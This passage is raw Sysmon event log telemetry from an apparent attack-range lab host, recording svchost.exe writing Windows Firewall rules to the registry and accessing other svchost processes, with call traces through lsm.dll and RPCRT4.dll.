13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{35CB5084-8673-4334-AF67-A46582E71FAB}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x800000000000000010754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{851236FE-418B-44C7-A556-82129164B447}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 13241300x800000000000000010753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.086{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B6DFE438-1E44-40B4-AC11-102F9C279AFE}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|Desc=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-969871995-3242822759-583047763-1618006129-3578262429-3647035748-2471858633|EmbedCtxt=@{Microsoft.AccountsControl_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources/DisplayName}| 10341000x800000000000000010752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.055{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 